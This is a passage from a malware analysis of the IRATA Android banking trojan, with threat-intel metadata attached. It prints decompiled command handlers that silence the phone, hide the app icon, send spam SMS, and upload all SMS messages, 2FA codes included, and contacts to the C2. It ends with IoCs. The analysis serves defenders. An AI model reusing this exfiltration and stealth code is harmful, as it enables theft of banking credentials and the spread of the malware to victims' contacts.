Each command is a string compared against _comand, and almost every handler also checks that the _android value carried in the message equals this device's Android ID (_androidid), so the operator can address a single bot even though a push message may reach many. The first group controls the phone's sound: vibrate sets the ringer to vibrate (ringer mode 1), silent zeroes the notification, system, alarm and music streams (5, 1, 4 and 3; the ring stream itself is not touched), and normal restores ringer mode 2 and sets those streams to 100. Silencing the phone is useful to the attacker while the bank's 2FA SMS are arriving.\n if (_comand.equals(\"vibrate\") \u0026\u0026 _android.equals(_androidid)) {\n Phone.SetRingerMode(1);\n }\n if (_comand.equals(NotificationCompat.GROUP_KEY_SILENT) \u0026\u0026 _android.equals(_androidid)) {\n Phone.SetVolume(5, 0, false);\n Phone.SetVolume(1, 0, false);\n Phone.SetVolume(4, 0, false);\n Phone.SetVolume(3, 0, false);\n }\n if (_comand.equals(\"normal\") \u0026\u0026 _android.equals(_androidid)) {\n Phone.SetRingerMode(2);\n Phone.SetVolume(5, 100, false);\n Phone.SetVolume(1, 100, false);\n Phone.SetVolume(4, 100, false);\n Phone.SetVolume(3, 100, false);\n }\nThe ping command is a liveness check: it is the one handler without an Android-ID check, so every bot that receives it answers (a roll call), while pingone targets a single bot. Both POST a result=ok\u0026action=...\u0026androidid=...\u0026model=...\u0026battry=... string to the _apilink URL. SendSingleMessage sends one SMS with the number and text carried in the push message (_nump, _txm); this is the spam/propagation primitive.\n if (_comand.equals(\"ping\")) {\n String str = \"result=ok\u0026action=ping\u0026androidid=\" + _android + \"\u0026model=\" + _model + \"\u0026battry=\" + _batt\n _data = str;\n _ht._poststring(_apilink, str);\n }\n if (_comand.equals(\"pingone\") \u0026\u0026 _android.equals(_androidid)) {\n String str2 = \"result=ok\u0026action=pingone\u0026androidid=\" + _android + \"\u0026model=\" + _model + \"\u0026battry=\" + _\n _data = str2;\n _ht._poststring(_apilink, str2);\n }\n if (_comand.equals(\"SendSingleMessage\") \u0026\u0026 _android.equals(_androidid)) {\n _sendlargesms(_nump, _txm);\n }\ngetdevicefullinfo reports the device details (operator, model and more) to the C2; hideicon and showhideicon hide or restore the launcher icon of the installed APK; and testphone reports whether the SEND_SMS, READ_SMS and READ_CONTACTS runtime permissions were granted, so the operator knows which bots are actually able to steal and spread.\n if (_comand.equals(\"getdevicefullinfo\") \u0026\u0026 _android.equals(_androidid)) {\n Common.LogImpl(\"83473462\", \"Deviceinfo is OK\", 0);\n String str3 = \"result=ok\u0026action=getdevicefullinfo\u0026androidid=\" + _android + \"\u0026opr=\" + _opr + \"\u0026model=\n _data = str3;\n _ht._poststring(_apilink, str3);\n }\n if (_comand.equals(\"hideicon\") \u0026\u0026 
_android.equals(_androidid)) {\n Common.LogImpl(\"83473474\", \"hideicon is OK\", 0);\n _hideapp(true);\n }\n if (_comand.equals(\"showhideicon\") \u0026\u0026 _android.equals(_androidid)) {\n Common.LogImpl(\"83473483\", \"unhideicon is OK\", 0);\n _hideapp(false);\n }\n if (_comand.equals(\"testphone\") \u0026\u0026 _android.equals(_androidid)) {\n _result1 = _rn.Check(RuntimePermissions.PERMISSION_SEND_SMS);\n _result2 = _rn.Check(RuntimePermissions.PERMISSION_READ_SMS);\n _result3 = _rn.Check(RuntimePermissions.PERMISSION_READ_CONTACTS);\n String str4 = \"result=ok\u0026action=testphone\u0026sendsms=\" + BA.ObjectToString(Boolean.valueOf(_result1)) +\n _data = str4;\n _ht._poststring(_apilink, str4);\n }\nThe getsms command uploads every SMS on the victim's phone. It reads all messages through SmsWrapper.GetAll(), formats each one as a small text record (a { } block tagged @The_Mammadw with the address, body and date), writes the result to AllSms.txt in the app's internal storage, and POSTs that file to upload.php. With the card data already phished and the whole inbox, 2FA codes included, in the attacker's hands, the victim's account is fully exposed.\nif (_comand.equals(\"getsms\") \u0026\u0026 _android.equals(_androidid)) {\n Common.LogImpl(\"83473500\", \"GetLastSms is OK\", 0);\n _li.Initialize();\n List GetAll = _sms2.GetAll();\n _li = GetAll;\n int size = GetAll.getSize();\n String str5 = \"\";\n for (int i = 0; i \u003c= size - 1; i++) {\n _sms = (SmsWrapper.Sms) _li.Get(i);\n StringBuilder sb = new StringBuilder();\n sb.append(str5);\n sb.append(Common.CRLF);\n sb.append(Common.CRLF);\n sb.append(\"{\");\n sb.append(Common.CRLF);\n sb.append(\"@The_Mammadw\");\n sb.append(Common.CRLF);\n sb.append(\"Conversion:\");\n sb.append(_sms.Address);\n sb.append(Common.CRLF);\n sb.append(\"Text:\");\n sb.append(_sms.Body);\n sb.append(Common.CRLF);\n sb.append(\"Date:\");\n DateTime dateTime = Common.DateTime;\n sb.append(DateTime.Date(_sms.Date));\n sb.append(\" \");\n DateTime dateTime2 = Common.DateTime;\n 
sb.append(DateTime.Time(_sms.Date));\r\n sb.append(Common.CRLF);\r\n sb.append(\"}\");\r\n str5 = sb.toString();\r\n }\r\n File file = Common.File;\r\n File file2 = Common.File;\r\n File.WriteString(File.getDirInternal(), \"AllSms.txt\", str5);\r\n File file3 = Common.File;\r\n _ht._postfile(_port1 + \"/upload.php?result=ok\u0026action=upload\u0026androidid=\" + _android + \"\u0026opr=\" + _opr\r\n }\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 19 of 23\n\nThen the malware send the command getcontact to get all contacts of the victim to make new victims. After the\r\nmalware gets contacts, the malware will send spam SMS to the contacts to lure victims.\r\n if (_comand.equals(\"getcontact\") \u0026\u0026 _android.equals(_androidid)) {\r\n Common.LogImpl(\"83473516\", \"contact is OK\", 0);\r\n contactsutils contactsutilsVar = new contactsutils();\r\n contactsutilsVar._initialize(processBA);\r\n List _findcontactsbyphone = contactsutilsVar._findcontactsbyphone(\"\", false, false);\r\n int size2 = _findcontactsbyphone.getSize();\r\n String str6 = \"\";\r\n for (int i2 = 0; i2 \u003c size2; i2++) {\r\n List _getphones = contactsutilsVar._getphones(((contactsutils._cucontact) _findcontactsbyphone.G\r\n int size3 = _getphones.getSize();\r\n for (int i3 = 0; i3 \u003c size3; i3++) {\r\n contactsutils._cuphone _cuphoneVar = (contactsutils._cuphone) _getphones.Get(i3);\r\n str6 = str6 + Common.CRLF + \"@The_Mammadw\" + Common.CRLF + _cucontactVar.DisplayName + \": \"\r\n }\r\n }\r\n File file4 = Common.File;\r\n File file5 = Common.File;\r\n File.WriteString(File.getDirInternal(), \"Contacts.txt\", str6);\r\n File file6 = Common.File;\r\n _ht._postfile(_port1 + \"/upload.php?result=ok\u0026action=upload1\u0026androidid=\" + _android + \"\u0026opr=\" + _opr\r\n }\r\nThe malware will try to maintain presistance to the victim’s phone. So the victim won’t suspect about the installed\r\nAPK. 
So the malware will hide the icon of the malicious APK.\r\n public static String _hideapp(boolean z) throws Exception {\r\n Reflection reflection = new Reflection();\r\n B4AApplication b4AApplication = Common.Application;\r\n String packageName = B4AApplication.getPackageName();\r\n StringBuilder sb = new StringBuilder();\r\n B4AApplication b4AApplication2 = Common.Application;\r\n sb.append(B4AApplication.getPackageName());\r\n sb.append(\".main\");\r\n Object CreateObject2 = reflection.CreateObject2(\"android.content.ComponentName\", new Object[]{packageNam\r\n reflection.Target = reflection.GetContext(processBA);\r\n reflection.Target = reflection.RunMethod(\"getPackageManager\");\r\n reflection.Target = reflection.RunMethod4(\"setComponentEnabledSetting\", new Object[]{CreateObject2, Inte\r\n return \"\";\r\n }\r\nDynamic analysisPermalink\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 20 of 23\n\nNow we will try to run the malicious APK on android emulator using Android studio and intercept the http/s\r\nusing Burp Suite . After installing the malware.\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 21 of 23\n\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 22 of 23\n\nFigure(4)\r\nIoCPermalink\r\nNo. Description Hash and URLs\r\n1 The APK hash (MD5) ce41d55ee66d509e1e2043d9e238f65a\r\n2 C2 server hxxp:///usenlghusk.gq/USK/rat.php\r\n3 C2 Server hxxp://usenlghusk.gq/USK\r\nArticle QuotePermalink\r\nُه\r\nايا سالكني إليه الدرب ال تِقفوا .. طاَب الوصول لمحرومٍـ تم ّن\r\nREFPermalink\r\n1- IRATA\r\nSource: https://muha2xmad.github.io/malware-analysis/irata/\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 23 of 23",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://muha2xmad.github.io/malware-analysis/irata/"
	],
	"report_names": [
		"irata"
	],
	"threat_actors": [],
	"ts_created_at": 1775434468,
	"ts_updated_at": 1775791203,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/893f0adbc9bc565d0dfe8621c7964f3ca488d65f.pdf",
		"text": "https://archive.orkl.eu/893f0adbc9bc565d0dfe8621c7964f3ca488d65f.txt",
		"img": "https://archive.orkl.eu/893f0adbc9bc565d0dfe8621c7964f3ca488d65f.jpg"
	}
}